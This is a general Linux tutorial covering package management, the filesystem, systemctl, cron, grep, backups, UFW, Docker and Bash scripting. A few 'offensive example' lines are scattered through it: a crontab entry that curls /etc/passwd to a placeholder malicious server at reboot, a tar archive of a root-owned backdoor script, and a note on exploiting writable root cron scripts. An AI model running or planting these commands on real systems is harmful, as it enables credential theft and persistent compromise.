Linux Basics for Hackers, Developers, and System Administrators

Introduction

In this guide, I will cover essential Linux concepts, from basic commands Linux Basics for Hackers, Developers, and System Administratorsto advanced system management. First, I will explain the significance of Linux in various domains like servers, development, cybersecurity, and embedded systems.

Then, I will walk you through setting up different desktop environments, installing software with APT, and managing services using systemctl. You’ll also learn about cron jobs for automating tasks and exploring tools like docker, nmap, iptables, and htop. Further, we’ll dive into scripting with Bash, including variable management, loops, and functions, and I will also highlight important backup strategies and security tools like UFW.

Here’s why Linux is indispensable:

Servers: Most web servers, enterprise servers, and cloud platforms rely on Linux due to its reliability and performance.
Development: Linux provides an unparalleled development environment, complete with extensive tools, libraries, and support for multiple programming languages.
Cybersecurity: Penetration testers and bug bounty hunters also use Linux for its customizable environment and advanced tools like Metasploit, Burp Suite, and Nmap.
Embedded Systems: Linux powers IoT devices, Android smartphones, smart appliances, and industrial systems.
Personal Computing: Loved by developers and tech enthusiasts for its customizability, lightweight distributions, and open-source ethos.

Linux Desktop Environments

Linux offers a variety of desktop environments (DEs), catering to different use cases and preferences:

KDE Plasma: A feature-rich and highly customizable DE.
GNOME: A modern and minimalist DE with a focus on usability.
XFCE: Lightweight and ideal for older hardware or users prioritizing speed.
Cinnamon: Provides a traditional desktop experience with modern features.

Installing KDE Plasma on Debian

Update the system:

sudo apt update && sudo apt upgrade

Install KDE Plasma:

sudo apt install kde-plasma-desktop

Reboot the system:

sudo reboot

Select “Plasma” at the login screen.

The APT Package Management System

APT (Advanced Package Tool) is a package management system for Debian-based distributions like Ubuntu. It simplifies software installation, upgrades, and management.

Common APT Commands

Update package lists:

sudo apt update

Upgrade installed packages:

sudo apt upgrade

Install a package:

sudo apt install package_name

Remove a package:

sudo apt remove package_name

Clean up unused packages:

sudo apt autoremove

Search for a package:

apt search package_name

View package details:

apt show package_name

Linux File System Structure

The Linux file system is the backbone of the operating system, organizing data in a structured hierarchy. It follows the Filesystem Hierarchy Standard (FHS), which defines specific purposes for directories.

Here’s a broad overview:

Directories and Their Functions

/ (Root Directory): The base of the file system, containing all other directories.
/home: Stores personal files, settings, and user-specific data. Each user gets a subdirectory (e.g., /home/user).
/etc: Houses system-wide configuration files. For example, hosts and passwd.
/var: Contains variable data like logs (/var/log), spools, and caches.
/usr: Contains user-installed software, libraries, and documentation. Common subdirectories include /usr/bin (binaries) and /usr/share (shared data).
/tmp: A temporary directory where applications and the system can store transient files.
/boot: Includes bootloader files like the Linux kernel and grub configurations.
/dev: Contains device files, which represent hardware like disks (/dev/sda) and peripherals.
/proc and /sys: Virtual filesystems that provide runtime information about the system and kernel parameters.
/opt: Reserved for optional, third-party software packages.
/root: The home directory for the root (administrative) user.

File Permissions

Every file and directory in Linux has associated permissions for read, write, and execute operations. Permissions are assigned to the owner, group, and others, with commands like chmod, chown, and ls -l used for management.

Filesystem Types

Linux supports various filesystems, including:

ext4: The most commonly used filesystem in modern Linux distributions.
xfs: Designed for high-performance and scalability.
btrfs: A modern filesystem with snapshot and error detection capabilities.
vfat/NTFS: For interoperability with Windows systems.

Mounting and Partitioning

Drives and partitions in Linux are not automatically accessible; they must be mounted to directories (mount points). For example, /mnt and /media are commonly used for mounting removable drives. Commands like mount, umount, and df are used to manage and view mounted filesystems.

Important Commands

ls: List files in a directory.
cd: Change the current directory.
pwd: Display the present working directory.
df: Show disk usage statistics.
du: Display space used by files and directories.
find: Search for files in the filesystem.

Advanced Linux Commands

systemctl: Manage systemd services

systemctl is a powerful command to control system services and processes managed by systemd. It allows you to start, stop, enable, disable, and check the status of services.

Restart a service:

systemctl restart apache2

Restarts the Apache web server service.

Check the status of a service:

systemctl status apache2

Displays detailed information about the service’s current state.

Enable a service at boot:

systemctl enable apache2

Configures the service to start automatically during boot.

Disable a service at boot:

systemctl disable apache2

Prevents the service from starting at boot.

journalctl: View system logs

journalctl allows you to query and view logs collected by systemd's journal service. This is useful for debugging and monitoring system behavior.

View logs for a specific service:

journalctl -u apache2

Displays logs associated with the Apache web server service.

View logs from the last boot:

journalctl -b

Shows logs from the most recent boot session.

Follow real-time logs:

journalctl -f

Continuously displays new log entries as they are recorded.

cron: Schedule recurring tasks

cron is a job scheduler that runs tasks at specified times or intervals. The configuration for each user is stored in a crontab file.

Edit the crontab file:

crontab -e

Opens the crontab editor for the current user to schedule tasks.

Common syntax for scheduling tasks:

* * * * * /path/to/command
| | | | |
| | | | +-- Day of the week (0 - 7) (Sunday = 0 or 7)
| | | +---- Month (1 - 12)
| | +------ Day of the month (1 - 31)
| +-------- Hour (0 - 23)
+---------- Minute (0 - 59)

Example:

0 3 * * * /usr/bin/backup.sh

Runs backup.sh every day at 3:00 AM.

Malicious Crontab Example:

@reboot curl -X POST -d "$(cat /etc/passwd)" http://malicious-server.com

This will exfiltrate /etc/passwd.

Privilege Escalation Example:

* * * * * root /usr/local/bin/vulnerable_script.sh

Exploit writable script executed with root privileges.

Resources for crontab:
Crontab Guru: An online editor and interpreter for crontab expressions.
man 5 crontab: Built-in Linux manual page for detailed syntax and options.

Alternatives to cron: screen and tmux

While cron handles scheduled tasks, sometimes you need tools for long-running tasks or session persistence. Two popular alternatives are:

screen: Allows you to create, detach, and reattach terminal sessions.
Start a new session:

screen

Detach a session: Press Ctrl+A, then D.
Reattach to a session:

screen -r

tmux: A more modern alternative to screen with advanced features for managing terminal sessions.
Start a new session:

tmux new -s session_name

Detach a session: Press Ctrl+B, then D.
Reattach to a session:

tmux attach-session -t session_name

df -h: Disk space usage

df is used to display information about file system disk space usage.

Display disk usage in human-readable format:

df -h

Outputs disk space usage for all mounted file systems in a human-readable format (e.g., GB or MB).

Check disk usage for a specific directory or device:

df -h /home

Shows the disk usage statistics for the /home directory.

Networking and Security

nmap: Perform network scans.

nmap -sV 192.168.1.1

tcpdump: Analyze network packets.

tcpdump -i eth0

iptables: Configure the firewall.

iptables -A INPUT -p tcp --dport 22 -j ACCEPT

Process and Resource Management

htop: Interactive process monitoring.

htop

kill: Terminate processes.

kill -9 1337

nice: Adjust process priority.

nice -n 10 command

Power of Grep

Search text patterns in files.

grep "pattern" file_name
grep -i "pattern" file_name  # Case-insensitive

Search for a specific word in a file:

grep "error" /var/log/syslog

Search recursively in all files within a directory:

grep -r "TODO" /path/to/code

Display line numbers with matches:

grep -n "user" /etc/passwd

Invert match to show lines that do not contain the pattern:

grep -v "127.0.0.1" /etc/hosts

Highlight matched patterns:

grep --color=auto "root" /etc/passwd

Count occurrences of a pattern:

grep -c "ssh" /var/log/auth.log

Match whole words only:

grep -w "sudo" /etc/group

Search multiple patterns:

grep -Ei "(error|fail)" /var/log/syslog

Search patterns from a file:

grep -f patterns.txt /var/log/messages

Recovery and Malware Detection

Recovery

Boot into Recovery Mode: Access GRUB during boot by pressing Shift. Select recovery mode to troubleshoot.
Reset Root Password:

First, boot into recovery mode.

Remount the filesystem as writable:

mount -o remount,rw /

Change the root password:

passwd root

Malware Detection

List Running Processes:

ps aux

Check Network Connections:

netstat -an | grep ESTABLISHED

Scan for Malware:

chkrootkit

Backup and Disaster Recovery

Backup and disaster recovery are critical responsibilities especially for system administrators to ensure data safety, system availability, and business continuity in the event of system failures, data corruption, or cyberattacks. Here’s an in-depth look:

Types of Backups

Full Backup

Copies all files and data in the system.
Suitable for initial backups or critical points but resource-intensive.
Example Command:

rsync -av /source /backup/full_backup/

Use case: Initial deployment or before major upgrades.

Incremental Backup

Backs up only the files that have changed since the last backup.
Example Command:

rsync -av --compare-dest=/backup/full_backup/ /source /backup/incremental_backup/

Use case: Frequent backups with reduced storage and time requirements.

Differential Backup

Backs up changes since the last full backup.
Example Command:

rsync -av --compare-dest=/backup/full_backup/ /source /backup/differential_backup/

Use case: Restoring data quickly with fewer dependencies compared to incremental backups.

Snapshot Backup

Captures the system’s state at a specific point in time. Often used with filesystems like Btrfs, ZFS, or LVM.
Example Command:

lvcreate -L 5G -s -n backup_snapshot /dev/vg0/lv0

Use case: Quickly restore data or test updates without affecting production data.

Backup Tools

Rsync:

Ideal for syncing directories locally or remotely.
Example: Backup home directories while excluding certain files:

rsync -av --exclude '*.tmp' /home /backup/home_backup/

Features: Incremental backups, compression, and bandwidth control.

BorgBackup:

A deduplicating backup tool with encryption and compression.
Example:

borg init --encryption=repokey /path/to/repo
borg create /path/to/repo::backup-{now:%Y-%m-%d} /important/data

Features: Efficient storage for repeated backups and secure encryption.

Duplicity

Encrypted, incremental backups for local or cloud storage.
Example:

duplicity /source file:///backup

Features: GPG encryption and cloud integration (AWS, Google Drive, etc.).

Restic:

Cross-platform backup tool that supports encryption and deduplication.
Example:

restic init -r /backup/repository
restic backup /data

Features: Fast and portable backups.

Tar for Archiving

A classic utility for creating archives.
Example: Compress a directory for backup:

tar -czvf backup.tar.gz /important/data

Offensive Example:

Exploit tar files with malicious payloads:

tar -cvf malicious.tar --owner=root --group=root /tmp/backdoor.sh

Scheduling Backups

Automate backups using cron or systemd timers.

Example Cron Job:
Schedule a daily backup at midnight:

0 0 * * * rsync -av /source /backup >> /var/log/backup.log 2>&1

Systemd Timer Example:
Create a timer and service to run backups:

Service File (/etc/systemd/system/backup.service):

[Unit]
Description=Daily Backup

[Service]
ExecStart=/usr/bin/rsync -av /source /backup

Timer File (/etc/systemd/system/backup.timer):

[Unit]
Description=Daily Backup Timer

[Timer]
OnCalendar=*-*-* 00:00:00
Persistent=true

[Install]
WantedBy=timers.target

Enable and start the timer:

systemctl enable backup.timer
systemctl start backup.timer

Testing Disaster Recovery

Regularly test your backups to ensure data can be restored as expected.

Verify Backup Integrity:

Example: Use borg to verify backups:

borg check /path/to/repo

Simulate Recovery Scenarios:

Restore files to a test environment to verify integrity:

rsync -av /backup /test_recovery/

Bootable Backup Media:

Create a bootable backup of the system:

dd if=/dev/sda of=/backup/system_image.img bs=4M

Offensive Example: Generate junk data and upload to an API (for testing or malicious intent):

dd if=/dev/urandom bs=1M count=10 | curl -X POST -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" -H "Content-Type: application/octet-stream" --data-binary @- http://example.com/api/upload

Explanation: Here, dd creates 10 MB of random data using /dev/urandom, and curl uploads it to an API endpoint. This can simulate stress testing or, if misused, could be part of a malicious attack to overwhelm a server.

Advanced Backup

Offsite Backups:

Use cloud storage (e.g., AWS S3, Google Cloud) or external drives for redundancy.
Example: Sync to AWS S3 using the AWS CLI:

aws s3 sync /backup s3://yourbucketname

Database Backups:

Use database-specific tools like mysqldump for MySQL:

mysqldump -u root -p database_name > database_backup.sql

Version Control for Configuration Files:

Use Git to track and back up critical configuration files:

git init /etc/config_repo
cd /etc/config_repo
git add /etc/nginx/nginx.conf
git commit -m "Initial config backup"

Immutable Backups:

Use object storage or write-once-read-many (WORM) backups for tamper-proof data retention.

Linux Security

Linux is known for its security features, making it a top choice for servers, developers, and cybersecurity professionals. By properly learning these built-in tools and best practices, you can secure your Linux system against a wide range of threats.

User and Permission Management

Linux enforces strict user permissions with ownership and access control for files and processes.
Commands like chmod, chown, and umask allow you to manage access to files and directories.
Use groups to organize user permissions and avoid assigning unnecessary privileges to individual users.

SSH Security

Best Practices:

Disable root login (PermitRootLogin no in /etc/ssh/sshd_config).
Use SSH key authentication instead of passwords.
Change the default SSH port to avoid automated attacks.
Example:

sudo ssh-keygen -t rsa -b 4096  # Generate SSH key

Mandatory Access Control (MAC)

Tools like SELinux and AppArmor add an extra layer of security by restricting application permissions.

Example:

sudo setenforce 1        # Enable SELinux enforcing mode
sudo aa-status           # Check AppArmor status

Intrusion Detection and Prevention

Use tools like fail2ban to prevent brute-force attacks.
Example:

sudo apt install fail2ban  
sudo systemctl enable fail2ban

Regularly scan logs using journalctl or tools like logwatch.
Keep the system up-to-date with the latest security patches using package managers:

sudo apt update && sudo apt upgrade

UFW (Uncomplicated Firewall)

The Uncomplicated Firewall (UFW) is a simple, user-friendly CLI tool for managing iptables on Linux systems. It’s commonly used to manage firewall rules and enhance system security with minimal effort.

Installation and Setup

Check if UFW is installed:

ufw --version

Install UFW (if not installed):

sudo apt install ufw

Enable UFW:

sudo ufw enable

Disable UFW:

sudo ufw disable

Check UFW status:

sudo ufw status sudo ufw status verbose

Basic Rules

Allow specific port:

sudo ufw allow 22

Allow port with protocol (TCP/UDP):

sudo ufw allow 80/tcp sudo ufw allow 53/udp

Allow port range:

sudo ufw allow 1000:2000/tcp

Deny specific port:

sudo ufw deny 23

Remove a rule:

sudo ufw delete allow 22

Enable logging (recommended for debugging):

sudo ufw logging on

Advanced Rules

Allow traffic from a specific IP:

sudo ufw allow from 192.168.1.100

Allow traffic from a specific IP to a port:

sudo ufw allow from 192.168.1.100 to any port 22

Deny traffic from a specific IP:

sudo ufw deny from 203.0.113.0

Allow traffic to a specific network range:

sudo ufw allow from 192.168.1.0/24

Limit connections to prevent brute force attacks:

sudo ufw limit ssh

The limit rule allows a maximum of 6 connections in 30 seconds from an IP. Beyond this, the IP will be blocked temporarily.

Service-Based Rules

UFW uses predefined application profiles stored in /etc/ufw/applications.d/.

List all available application profiles:

sudo ufw app list

Allow a service by its profile name:

sudo ufw allow 'Apache'

View details of an application profile:

sudo ufw app info 'Apache Full'

Default Policies

Set default to deny all incoming traffic:

sudo ufw default deny incoming

Set default to allow all outgoing traffic:

sudo ufw default allow outgoing

Set default to deny all outgoing traffic:

sudo ufw default deny outgoing

Rule Management

View numbered rules (for editing):

sudo ufw status numbered

Delete a specific rule by number:

sudo ufw delete [rule_number]

Testing UFW Rules

Simulate rule application without enabling UFW:

sudo ufw enable --dry-run

Check logs for blocked connections:

sudo tail -f /var/log/ufw.log

Offensive Example

Open unnecessary ports for exploitation:

sudo ufw allow 1337/tcp

Virtualization and Containers

Virtualization and containerization allow you to create isolated environments for running applications or entire systems. Docker is a popular tool for containerization, and here’s how you can create a Kali Linux container.

Installing Docker

Install Docker on your Linux system:

sudo apt update  
sudo apt install docker.io  
sudo systemctl start docker  
sudo systemctl enable docker

Pulling a Kali Linux Docker Image

Docker Hub provides prebuilt images, including Kali Linux:

sudo docker pull kalilinux/kali-rolling

Running a Kali Linux Container

Start a new Kali Linux container:

sudo docker run -it kalilinux/kali-rolling /bin/bash

This launches an interactive shell within the container, giving you access to a Kali environment.

Persisting Changes in Containers

To save changes made in a container, you can commit it to a new image:

sudo docker commit <container_id> my_kali_image

Restart the container later with:

sudo docker run -it my_kali_image /bin/bash

Using Docker for Penetration Testing

Containers can isolate tools like Metasploit, Nmap, and Burp Suite. For instance, you can use the pre-installed tools in the Kali Linux image to scan and test networks without affecting the host system.

Advantages of Containers over Virtual Machines

Lightweight: Containers use fewer resources than full virtual machines.
Portability: Containers can run consistently across different environments.
Isolation: Applications run in isolated environments, reducing the risk of interference.

Bash Scripting Basics

Creating a Script

Open a file in a text editor:

nano script.sh

Add the following code:

#!/bin/bash
echo "Hello, World!"

Make the script executable:

chmod +x script.sh

Run the script:

./script.sh

Variables and Parameters

Defining and using variables:

name="Lyn"
echo "Hello, $name!"

Reading input from the user:

echo "Enter your name:"
read user_name
echo "Hello, $user_name!"

Using command-line arguments:

echo "Script name: $0"
echo "First argument: $1"
echo "All arguments: $@"

Conditional Statements

If-else example:

if [ -f file.txt ]; then
  echo "file.txt exists"
else
  echo "file.txt does not exist"
fi

Case statement:

case $1 in
  start)
    echo "Starting the process..."
    ;;
  stop)
    echo "Stopping the process..."
    ;;
  restart)
    echo "Restarting the process..."
    ;;
  *)
    echo "Usage: $0 {start|stop|restart}"
    ;;
esac

Loops

For loop example:

for i in {1..5}; do
  echo "Iteration $i"
done

While loop:

count=1
while [ $count -le 5 ]; do
  echo "Count: $count"
  count=$((count + 1))
done

Loop through files:

for file in *.txt; do
  echo "Processing $file"
done

Functions

Defining and calling functions:

my_function() {
  echo "This is a function"
}

my_function

Function with parameters:

greet() {
  echo "Hello, $1!"
}

greet "Lyn"

Return values from functions:

add() {
  result=$(( $1 + $2 ))
  return $result
}

add 3 5
echo "Sum: $?"

Advanced Examples

Logging with timestamps:

log_message() {
  echo "$(date +'%Y-%m-%d %H:%M:%S') - $1" >> script.log
}

log_message "Script started"

Error handling with traps:

trap 'echo "An error occurred at line $LINENO"; exit 1' ERR
echo "This will run smoothly"
false  # Simulate an error

Parallel execution with background processes:

task() {
  sleep 2
  echo "Task $1 completed"
}

for i in {1..5}; do
  task $i &
done

wait
echo "All tasks completed"

Processing CSV files:

while IFS=',' read -r column1 column2 column3; do
  echo "Col1: $column1, Col2: $column2, Col3: $column3"
done < data.csv

Creating and using arrays:

fruits=("apple" "banana" "cherry")
for fruit in "${fruits[@]}"; do
  echo "Fruit: $fruit"
done

File operations:

if [ -e "file.txt" ]; then
  echo "File exists"
else
  echo "File does not exist, creating it..."
  echo "Hello, file!" > file.txt
fi

Conclusion

This guide has equipped you with a comprehensive set of Linux skills that can be applied in multiple fields, from system administration to cybersecurity. By mastering commands for system management, automating tasks, and creating efficient backups, you’re ready to leverage Linux for various real-world applications. The flexibility and power of Linux are at your fingertips, whether you’re working with servers, desktops, or embedded systems. Embrace the open-source environment, and you’ll have the foundation to solve complex problems and streamline your workflow.